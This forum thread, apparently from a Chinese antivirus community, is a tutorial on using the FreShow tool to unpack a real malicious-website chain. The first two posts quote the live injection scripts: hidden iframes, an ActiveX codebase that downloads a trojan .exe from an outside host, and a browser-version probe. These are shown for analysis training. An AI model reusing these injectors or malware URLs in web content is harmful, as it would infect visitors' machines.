通过实例讲解freshow使用方法 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流通过实例讲解freshow使用方法

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

12 3 4 5 6 7

1 / 7 页

跳转页

通过实例讲解freshow使用方法

本主题由版主 networkedition 于 2009-8-5 9:55:46 执行主题置顶/取消操作

幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星	发表于： 2009-05-16 19:30 \| 只看楼主短消息资料字号：小中大 1楼通过实例讲解freshow使用方法大家肯定看了网马解密大讲堂——网马解密中级篇(Freshow工具使用方法) 可能有部分人不会请误点击下面任何网址,点击后果自负那好下面我通过实例给大家讲解一下请大家下载好freshow工具打开跟我一起做 1.请大家打开freshow 在"url"输入http://ln.vnet.cn/ads.js 然后check 如果你打不开就复制下面代码到复制到"上操作区"(就是URL下面空白处) [复制到剪贴板] CODE: var cookieString=document.cookie; var start=cookieString.indexOf("cookiesleep"); if(start!=-1){}else{var expires=new Date(); expires.setTime(expires.getTime()+246060*1000); document.cookie="cookiesleep=test;expires="+expires.toGMTString(); document.write("<iframe src=http://brrtydwsw.cn/07/0007.htm?22 width=100 height=0 border=0></iframe>");} 2.然后按filter,然后看见收集区域(最右面)里面多了一个网址http://brrtydwsw.cn/07/0007.htm?22 3.点击那个http://brrtydwsw.cn/07/0007.htm?22后发现URL显示那个网址了,继续check 下面就显示代码引用: <script> if(self.location==top.location) { location.href='http://www.google.cn'; } </script> <script language="javascript"> var now = new Date(); var miao = now.getSeconds(); document.write("<iframe width=100 height=0 src=new.html><\/iframe>"); document.write("<BR>"); document.write("<\/BR>"); document.write("<BR>"); document.write("<\/BR>"); if (miao>50&&miao<100) { document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>"); } else { document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>"); } </script> 用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MAXTHON 2.0) 本帖被评分 3 次本帖被评分 3 次幸福耗子最后编辑于 2009-05-17 20:55:38
幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星	分享到：

幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星	发表于： 2009-05-16 19:30 \| 只看楼主短消息资料字号：小中大 2楼回复: 通过实例讲解freshow方法 4.继续filter 右面收集区域又多了几个网址 5.点击http://brrtydwsw.cn/07/new.html 按check 引用: <iframe src=ytqm.htm width=100 height=0></iframe> <script src="js.js"></script> 6.继续fliter 点击http://brrtydwsw.cn/07/ytqm.htm 继续check 引用: <html> <head> <meta http-equiv="Content-Type" c> </head> <body bgcolor="#FFFFFF" text="#000000"> <br> <object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="http://oiuhfww.cn/7.exe#version=1,0,0,002" width="0" height="0"> </object> </body> </html> 在这里注意:http://oiuhfww.cn/7.exe 这个就是木马下载地址把那个木马下载网址复制到右下方obj空白处然后按insert 就ok了好了现在我把真正木马下载地址找到完毕后就开始输出日志了选中右面all前面的勾然后按log钮引用: Log is generated by FreShow. [wide]http://ln.vnet.cn/ads.js [frame]http://brrtydwsw.cn/07/0007.htm?22 [frame]http://brrtydwsw.cn/07/new.html [frame]http://brrtydwsw.cn/07/ytqm.htm [object]http://oiuhfww.cn/7.exe [script]http://brrtydwsw.cn/07/js.js [script]http://brrtydwsw.cn/07/\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\" [script]http://brrtydwsw.cn/07/\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\" 再本贴下面回复中粘贴一下就看到日志了出一道问题那个挂马网址才解一半你尝试继续解http://brrtydwsw.cn/07/js.js 可能考虑部分人打不开源码在下面 [复制到剪贴板] CODE: if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1) document.write("<iframe width=100 height=0 src=yt14.htm></iframe>"); document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>"); document.write("<iframe width=100 height=0 src=ytff.htm></iframe>"); document.write("<iframe width=100 height=0 src=ytvod.htm></iframe>"); if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0) document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>"); try{var m; var of=new ActiveXObject("MPS"+".S"+"to"+"rm"+"Pl"+"ay"+"er.1");} catch(m){}; finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=ytbb.htm></iframe>");}} document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>"); 他的木马下载地址是什么? 只要解出来一个就行因为那里所有挂的都是一个木马下载地址这个挂马方式没有采用任何加密挂马网址清晰可见答案在下面回帖就能看见 *** 该内容需回复才可浏览 *** 本帖被评分 1 次本帖被评分 1 次幸福耗子最后编辑于 2009-05-16 20:02:01
幸福耗子快乐黄口狮帖子:183 注册: 2008-08-18 来自:火星

於陵闲云卡卡反病毒小组帖子:113 注册: 2007-11-28 来自:	发表于： 2009-05-16 19:56 \| 短消息资料字号：小中大 3楼回复：通过实例讲解freshow方法前排听课 0.电脑安防交流群：79272952 1.下载windows清理助手，升级后清理系统。地址：http://download.arswp.com/arswp3/x86/arswp3_x86.zip 2.下载SREng，地址：http://download.kztechs.com/files/sreng2.zip 3.解压后运行SREngLdr.exe---智能扫描---扫描---保存报告。 4.将SREng.log日志文件压缩后上传。。
於陵闲云卡卡反病毒小组帖子:113 注册: 2007-11-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-05-16 20:02 \| 短消息资料字号：小中大 4楼回复：通过实例讲解freshow方法不错的教程，加油继续呀
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

smallyou93 卡卡反病毒小组帖子:1545 注册: 2008-12-14 来自:	发表于： 2009-05-16 20:03 \| 短消息资料字号：小中大 5楼回复：通过实例讲解freshow方法菜鸟学习中...
smallyou93 卡卡反病毒小组帖子:1545 注册: 2008-12-14 来自:

vistalong 卡卡反病毒小组帖子:157 注册: 2008-06-03 来自:	发表于： 2009-05-16 20:18 \| 短消息资料字号：小中大 6楼回复：通过实例讲解freshow方法进来看看
vistalong 卡卡反病毒小组帖子:157 注册: 2008-06-03 来自:

aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派	发表于： 2009-05-16 20:28 \| 短消息资料字号：小中大 7楼回复：通过实例讲解freshow方法看看
aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派

竹本无ベ卡卡反病毒小组帖子:79 注册: 2008-08-19 来自:南平	发表于： 2009-05-17 13:17 \| 短消息资料字号：小中大 8楼回复：通过实例讲解freshow方法温故而知新。很好的教程，再次学习下。
竹本无ベ卡卡反病毒小组帖子:79 注册: 2008-08-19 来自:南平

yinziyang06078 初生襁褓狮帖子:1 注册: 2009-05-19 来自:	发表于： 2009-05-19 15:59 \| 短消息资料字号：小中大 9楼回复：通过实例讲解freshow使用方法继续听课
yinziyang06078 初生襁褓狮帖子:1 注册: 2009-05-19 来自:

happysunday2003 叱咤花甲狮帖子:4313 注册: 2007-08-15 来自:358团	发表于： 2009-05-19 23:17 \| 短消息资料字号：小中大 10楼回复：通过实例讲解freshow使用方法加分顶起
happysunday2003 叱咤花甲狮帖子:4313 注册: 2007-08-15 来自:358团

<<上一主题|下一主题>>

12 3 4 5 6 7

1 / 7 页

跳转页

页面顶部

Powered by Discuz!NT